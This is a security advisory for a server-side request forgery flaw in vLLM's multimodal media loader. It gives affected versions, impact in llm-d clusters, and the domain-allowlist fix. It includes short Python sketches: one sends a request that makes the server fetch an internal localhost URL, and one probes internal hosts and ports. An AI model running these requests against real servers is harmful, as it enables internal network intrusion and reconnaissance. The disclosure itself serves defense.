GHSA-3F6C-7FW2-PPM4
Vulnerability from github – Published: 2025-10-07 22:14 – Updated: 2025-10-27 20:00
Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project's multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.
This vulnerability is particularly critical in containerized environments like llm-d, where a compromised vLLM pod could be used to scan the internal network, interact with other pods, and potentially cause denial of service or access sensitive data. For example, an attacker could make the vLLM pod send malicious requests to an internal llm-d management endpoint, leading to system instability by falsely reporting metrics like the KV cache state.
Vulnerability Details
The core of the vulnerability lies in the MediaConnector.load_from_url method and its asynchronous counterpart. These methods accept a URL string to fetch media content (images, audio, video).
https://github.com/vllm-project/vllm/blob/119f683949dfed10df769fe63b2676d7f1eb644e/vllm/multimodal/utils.py#L97-L113
The function directly processes URLs with http, https, and file schemes. An attacker can supply a URL pointing to an internal IP address or a localhost endpoint. The vLLM server will then initiate a connection to this internal resource.
- HTTP/HTTPS Scheme: An attacker can craft a request like {"image_url": "http://127.0.0.1:8080/internal_api"}. The vLLM server will send a GET request to this internal endpoint (see the sketch after this list).
- File Scheme: The _load_file_url method attempts to restrict file access to a subdirectory defined by --allowed-local-media-path. While this is a good security measure for local file access, it does not prevent network-based SSRF attacks.
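For illustration, here is a minimal sketch of the HTTP/HTTPS case: a multimodal chat-completion request whose image URL points at an internal address. The server address, model name, and internal target are placeholder assumptions, not values taken from the advisory; the payload follows the OpenAI-compatible multimodal format that vLLM's API server accepts.

```python
import requests

# Sketch of a malicious request against a vulnerable vLLM deployment (< 0.11.0).
# The server address, model name, and internal target below are placeholders.
VLLM_SERVER = "http://vllm.example.internal:8000"       # assumed deployment address
INTERNAL_TARGET = "http://127.0.0.1:8080/internal_api"  # SSRF target from the advisory

payload = {
    "model": "some-multimodal-model",  # placeholder model name
    "messages": [
        {
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                # The user-controlled URL that MediaConnector fetches server-side.
                {"type": "image_url", "image_url": {"url": INTERNAL_TARGET}},
            ],
        }
    ],
}

# The vLLM server, not the client, issues the GET request to INTERNAL_TARGET.
resp = requests.post(f"{VLLM_SERVER}/v1/chat/completions", json=payload, timeout=30)
print(resp.status_code, resp.text[:200])
```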
Impact in llm-d Environments
The risk is significantly amplified in orchestrated environments such as llm-d, where multiple pods communicate over an internal network.
- Denial of Service (DoS): An attacker could target internal management endpoints of other services within the llm-d cluster. For instance, if a monitoring or metrics service is exposed internally, an attacker could send malformed requests to it. A specific example is an attacker causing the vLLM pod to call an internal API that reports a false KV cache utilization, potentially triggering incorrect scaling decisions or even a system shutdown.
- Internal Network Reconnaissance: Attackers can use the vulnerability to scan the internal network for open ports and services by providing URLs like http://10.0.0.X:PORT and observing the server's response time or error messages (a sketch follows this list).
- Interaction with Internal Services: Any unsecured internal service becomes a potential target. This could include databases, internal APIs, or other model pods that might not have robust authentication, as they are not expected to be directly exposed.
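As a rough sketch of the reconnaissance scenario, the hypothetical probe below varies only the media URL and records the latency and error text returned for each candidate address. All addresses, ports, and the model name are placeholder assumptions; the point is that differences in the server's failure responses leak which internal hosts are reachable.

```python
import time
import requests

VLLM_SERVER = "http://vllm.example.internal:8000"  # assumed deployment address

def probe(internal_url: str) -> tuple[float, int, str]:
    # Same payload shape as the earlier sketch, with the target URL swapped in.
    payload = {
        "model": "some-multimodal-model",  # placeholder model name
        "messages": [{
            "role": "user",
            "content": [{"type": "image_url", "image_url": {"url": internal_url}}],
        }],
    }
    start = time.monotonic()
    resp = requests.post(f"{VLLM_SERVER}/v1/chat/completions", json=payload, timeout=30)
    return time.monotonic() - start, resp.status_code, resp.text[:120]

# Connection-refused vs. timeout vs. "not an image" errors, and their latencies,
# distinguish closed ports, filtered hosts, and live internal services.
for port in (80, 8080, 9090):
    print(port, probe(f"http://10.0.0.5:{port}/"))
```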
Delegating this security responsibility to an upper-level orchestrator like llm-d is problematic. The orchestrator cannot easily distinguish between legitimate requests initiated by the vLLM engine for its own purposes and malicious requests originating from user input, thus complicating traffic filtering rules and increasing management overhead.
Fix
See the --allowed-media-domains option discussed here: https://docs.vllm.ai/en/latest/usage/security.html#4-restrict-domains-access-for-media-urls
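Conceptually, the option enforces a host allowlist on media URLs before any fetch is made. The snippet below is only an illustration of that pattern, not vLLM's actual implementation; the helper name and domain list are made-up examples.

```python
from urllib.parse import urlparse

# Hypothetical illustration of the host-allowlist pattern that
# --allowed-media-domains enables; not vLLM's actual code.
ALLOWED_MEDIA_DOMAINS = {"images.example.com"}  # assumed deployment-specific list

def is_allowed_media_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    return parsed.hostname in ALLOWED_MEDIA_DOMAINS

# A URL targeting an internal endpoint is rejected before any request is made.
assert not is_allowed_media_url("http://127.0.0.1:8080/internal_api")
assert is_allowed_media_url("https://images.example.com/cat.png")
```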
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.5.0"
},
{
"fixed": "0.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-6242"
],
"database_specific": {
"cwe_ids": [
"CWE-601",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-07T22:14:15Z",
"nvd_published_at": "2025-10-07T20:15:36Z",
"severity": "HIGH"
},
"details": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in the `MediaConnector` class within the vLLM project\u0027s multimodal feature set. The `load_from_url` and `load_from_url_async` methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.\n\nThis vulnerability is particularly critical in containerized environments like `llm-d`, where a compromised vLLM pod could be used to scan the internal network, interact with other pods, and potentially cause denial of service or access sensitive data. For example, an attacker could make the vLLM pod send malicious requests to an internal `llm-d` management endpoint, leading to system instability by falsely reporting metrics like the KV cache state.\n\n### Vulnerability Details\n\nThe core of the vulnerability lies in the `MediaConnector.load_from_url` method and its asynchronous counterpart. These methods accept a URL string to fetch media content (images, audio, video).\n\nhttps://github.com/vllm-project/vllm/blob/119f683949dfed10df769fe63b2676d7f1eb644e/vllm/multimodal/utils.py#L97-L113\n\nThe function directly processes URLs with `http`, `https`, and `file` schemes. An attacker can supply a URL pointing to an internal IP address or a `localhost` endpoint. The vLLM server will then initiate a connection to this internal resource.\n\n* **HTTP/HTTPS Scheme:** An attacker can craft a request like `{\"image_url\": \"http://127.0.0.1:8080/internal_api\"}`. The vLLM server will send a GET request to this internal endpoint.\n* **File Scheme:** The `_load_file_url` method attempts to restrict file access to a subdirectory defined by `--allowed-local-media-path`. While this is a good security measure for local file access, it does not prevent network-based SSRF attacks.\n\n### Impact in `llm-d` Environments\n\nThe risk is significantly amplified in orchestrated environments such as `llm-d`, where multiple pods communicate over an internal network.\n\n1. **Denial of Service (DoS):** An attacker could target internal management endpoints of other services within the `llm-d` cluster. For instance, if a monitoring or metrics service is exposed internally, an attacker could send malformed requests to it. A specific example is an attacker causing the vLLM pod to call an internal API that reports a false KV cache utilization, potentially triggering incorrect scaling decisions or even a system shutdown.\n\n2. **Internal Network Reconnaissance:** Attackers can use the vulnerability to scan the internal network for open ports and services by providing URLs like `http://10.0.0.X:PORT` and observing the server\u0027s response time or error messages.\n\n3. **Interaction with Internal Services:** Any unsecured internal service becomes a potential target. This could include databases, internal APIs, or other model pods that might not have robust authentication, as they are not expected to be directly exposed.\n\nDelegating this security responsibility to an upper-level orchestrator like `llm-d` is problematic. 
**The orchestrator cannot easily distinguish between legitimate requests initiated by the vLLM engine for its own purposes and malicious requests originating from user input, thus complicating traffic filtering rules and increasing management overhead.**\n\n### Fix\n\nSee the `--allowed-media-domains` option discussed here: https://docs.vllm.ai/en/latest/usage/security.html#4-restrict-domains-access-for-media-urls",
"id": "GHSA-3f6c-7fw2-ppm4",
"modified": "2025-10-27T20:00:22Z",
"published": "2025-10-07T22:14:15Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-3f6c-7fw2-ppm4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6242"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/commit/9d9a2b77f19f68262d5e469c4e82c0f6365ad72d"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-6242"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373716"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM is vulnerable to Server-Side Request Forgery (SSRF) through `MediaConnector` class"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.